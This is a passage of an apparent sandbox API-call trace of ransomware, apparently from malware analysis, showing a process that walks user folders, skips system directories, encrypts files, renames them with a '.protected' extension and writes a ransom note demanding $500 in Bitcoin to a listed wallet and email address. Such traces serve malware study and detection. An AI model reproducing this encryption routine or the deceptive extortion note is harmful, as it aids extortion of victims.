(lpFirst="MSIMGSIZ.DAT", lpSrch=".txt") returned 0x0 [0084.857] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT") returned 88 [0084.857] StrStrW (lpFirst="MSIMGSIZ.DAT", lpSrch=".rar") returned 0x0 [0084.857] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT") returned 88 [0084.857] StrStrW (lpFirst="MSIMGSIZ.DAT", lpSrch=".zip") returned 0x0 [0084.857] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.858] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.858] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.859] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.859] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.859] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.859] CloseHandle (hObject=0x14c) returned 1 [0084.859] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.protected") returned 98 [0084.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat.protected")) returned 1 [0084.860] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="Windows") returned -1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="Program Files") returned 1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="Program Files (x86)") returned 1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="$Recycle.bin") returned 1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="System Volume Information") returned -1 [0084.860] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery") returned 84 [0084.860] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0084.860] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0084.860] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*") returned 86 [0084.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.860] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.860] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.860] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.860] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.860] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.860] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\.") returned 86 [0084.860] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.860] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.860] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.860] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.860] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.860] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.860] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.860] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\..") returned 87 [0084.860] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.861] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.861] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="Windows") returned -1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="Program Files") returned -1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="Program Files (x86)") returned -1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="$Recycle.bin") returned 1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="System Volume Information") returned -1 [0084.861] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active") returned 91 [0084.861] lstrcmpW (lpString1="Active", lpString2=".") returned 1 [0084.861] lstrcmpW (lpString1="Active", lpString2="..") returned 1 [0084.861] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*") returned 93 [0084.861] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.861] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.861] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.861] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.861] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.861] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.861] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\.") returned 93 [0084.861] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.861] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.862] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.862] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.862] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.862] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.862] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.862] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\..") returned 94 [0084.862] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.862] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.862] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.862] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.862] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RESTORE_FILES.txt") returned 109 [0084.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.862] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.862] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.863] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.863] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.863] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.863] CloseHandle (hObject=0x150) returned 1 [0084.863] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="Windows") returned -1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="Program Files") returned -1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="Program Files (x86)") returned -1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="$Recycle.bin") returned 1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="System Volume Information") returned -1 [0084.864] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active") returned 96 [0084.864] lstrcmpW (lpString1="Last Active", lpString2=".") returned 1 [0084.864] lstrcmpW (lpString1="Last Active", lpString2="..") returned 1 [0084.864] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\*") returned 98 [0084.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.865] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.865] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.865] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.865] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.865] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.865] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\.") returned 98 [0084.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.865] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.865] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.865] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.865] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.865] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.866] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.866] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\..") returned 99 [0084.866] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.866] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.866] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.866] lstrcmpiW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Windows") returned -1 [0084.866] lstrcmpiW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files") returned 1 [0084.866] lstrcmpiW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files (x86)") returned 1 [0084.866] lstrcmpiW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="$Recycle.bin") returned 1 [0084.866] lstrcmpiW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="System Volume Information") returned -1 [0084.866] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 153 [0084.866] StrStrIW (lpFirst="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".protected") returned 0x0 [0084.866] lstrcmpW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.866] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.866] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 153 [0084.866] StrStrW (lpFirst="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0084.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 153 [0084.866] StrStrW (lpFirst="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".rar") returned 0x0 [0084.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 153 [0084.866] StrStrW (lpFirst="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".zip") returned 0x0 [0084.866] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0xe00, lpOverlapped=0x0) returned 1 [0084.878] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.878] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0xe00, lpOverlapped=0x0) returned 1 [0084.878] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.878] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.878] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.879] CloseHandle (hObject=0x154) returned 1 [0084.879] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected") returned 163 [0084.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat.protected")) returned 1 [0084.880] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="Windows") returned -1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="Program Files") returned 1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="Program Files (x86)") returned 1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="$Recycle.bin") returned 1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="System Volume Information") returned -1 [0084.880] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat") returned 153 [0084.880] StrStrIW (lpFirst="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpSrch=".protected") returned 0x0 [0084.880] lstrcmpW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.880] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.880] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.881] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat") returned 153 [0084.881] StrStrW (lpFirst="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0084.881] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat") returned 153 [0084.881] StrStrW (lpFirst="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpSrch=".rar") returned 0x0 [0084.881] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat") returned 153 [0084.881] StrStrW (lpFirst="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpSrch=".zip") returned 0x0 [0084.881] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.882] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.882] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.882] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.883] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.883] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.883] CloseHandle (hObject=0x154) returned 1 [0084.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 